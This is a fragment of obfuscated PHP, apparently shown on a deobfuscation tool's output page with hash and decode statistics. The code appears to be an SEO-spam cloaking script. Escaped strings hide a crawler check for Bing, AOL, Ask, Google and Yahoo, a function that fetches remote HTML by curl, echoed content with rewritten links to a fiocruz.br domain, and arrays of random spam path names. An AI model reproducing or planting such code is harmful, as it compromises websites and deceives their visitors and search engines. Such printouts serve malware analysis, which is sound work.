str_replace("\150\164\164\160\x3a\x2f\x2f\150\151\x73\x74\157\162\x69\141\166\x69\x76\141\x2e\146\151\157\143\162\165\x7a\x2e\142\162\57", "\150\164\164\x70\163\x3a\57\57\x68\151\163\164\157\x72\x69\141\166\x69\166\x61\56\146\x69\157\x63\162\x75\x7a\56\142\x72\57", $con); $con = str_replace("\56\150\164\155\x6c", '', $con); echo $con; die; } } } goto J0EoZ; BXrEj: $lujingArrays7 = array("\x68\x65\x61\x6c\x74\150", "\156\x75\x74\x72\x69\164\x69\x6f\x6e", "\x68\171\x70\157\147\154\171\143\x65\x6d\x69\141", "\x68\x6f\x6d\145\x64\x65\x6c\151\166\x65\x72\x79", "\x74\171\x70\x65\62", "\x64\151\x61\142\x65\164\145\163", "\164\145\x73\x74\x73", "\x6e\165\164\162\151\x74\x69\157\x6e\x73\157\x75\x72\x63\x65"); goto jnbwQ; R2iQe: function chref($crefs) { $truecref = str_replace("\x78", '', "\142\170\170\x69\170\156\170\x67\170\174\x78\141\170\157\170\170\154\170\x7c\x61\x78\163\170\x78\153\x7c\170\147\x78\157\170\x78\157\170\147\x78\154\170\145\x7c\171\170\170\141\170\150\170\x6f\170\x6f\174\x73\x78\145\x78\x78\x61\x78\162\170\x63\x78\x68"); if (preg_match("\57{$truecref}\57\x69", $crefs)) { return true; } else { return false; } } goto UMpmn; A4IV5: function getHtml($url) { $content = file_get_contents($url); if (empty($content)) { $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $content = curl_exec($ch); curl_close($ch); } return $content; } goto R2iQe; KvcVH: $lujingNums = count($lujingArrays7) - 1; goto oQglQ; J0EoZ: $lujingNums = count($lujingArrays6) - 1; goto nUdyv; jm1o8: $lujingArrays6 = array("\x41\x74\144\x69\141\142\145\164\x65\x73\x51\x77", "\102\x74\144\x69\x61\142\x65\x74\x65\x73\131\164", "\x42\x63\144\151\x61\142\145\164\x65\x73\x58\x73", "\x43\166\144\x69\141\142\x65\164\145\x73\x53\x6a", "\122\151\144\x69\141\142\x65\164\145\x73\x51\167", "\x50\x69\144\x69\141\142\145\164\145\163\124\162", "\113\151\x64\151\141\142\x65\x74\145\163\102\x76", "\x4c\153\x64\151\141\142\x65\x74\x65\163\x49\111", "\112\x6b\144\151\x61\x62\x65\x74\145\163\115\142", "\x46\147\x64\x69\141\142\x65\x74\145\x73\123\x68"); goto BXrEj; rewxk: $lujingArrays4 = array("\162\144\143\151\146\x65\163\164\121", "\x62\x64\x69\x65\x74\172\106\106\x4e", "\127\x4c\144\x69\x65\x74\x73\125\131", "\x64\171\111\x77\x45\162\164\144\x4e", "\x4c\144\151\x65\164\152\x77\x54\x48", "\x45\x64\162\151\x63\145\x78\x74\x65", "\x64\121\151\105\145\x74\103\x42\x55", "\x49\144\x49\151\145\164\113\167\154", "\x64\154\x47\151\145\x74\x49\131\141", "\144\x46\151\145\x74\141\110\156\x42", "\144\x54\151\x65\164\156\x41\x70\104", "\x44\172\144\151\145\x74\113\130\113", "\x6b\x65\164\157\120\x49\112\144\x43"); goto mTYdz; MeojI: $lujingNums = count($lujingArrays4) - 1; goto si6NS; UMpmn: $lujingArray = array("\x41\x6b\152\x62\163", "\142\107\150\142\163", "\143\141\x44\x62\x73", "\x44\146\x6a\142\x73", "\x45\x72\164\142\163", "\106\147\150\x62\163", "\x47\150\x69\x62\163", "\x48\153\110\x62\163", "\x4a\x6b\x69\x42\123", "\113\123\x72\x62\x73"); goto vCeVW; mTYdz: $lujingArrays5 = array("\122\x69\142\x70", "\x57\x71\142\160", "\x62\142\160\x43", "\x69\142\x70\x66", "\x4d\x54\142\160", "\x5a\x76\142\160", "\150\x70\143\x64", "\x4f\x4d\x62\x70", "\146\x74\x70\142", "\125\151\142\160", "\103\x74\142\160", "\x4b\x77\142\x70", "\124\143\x62\x70"); goto jm1o8; zhDkI: ?>

Function Calls

None

Variables

None

Stats

MD5 e814d4c0aaddea2542eb1238e887b6d8
Eval Count 0
Decode Time 73 ms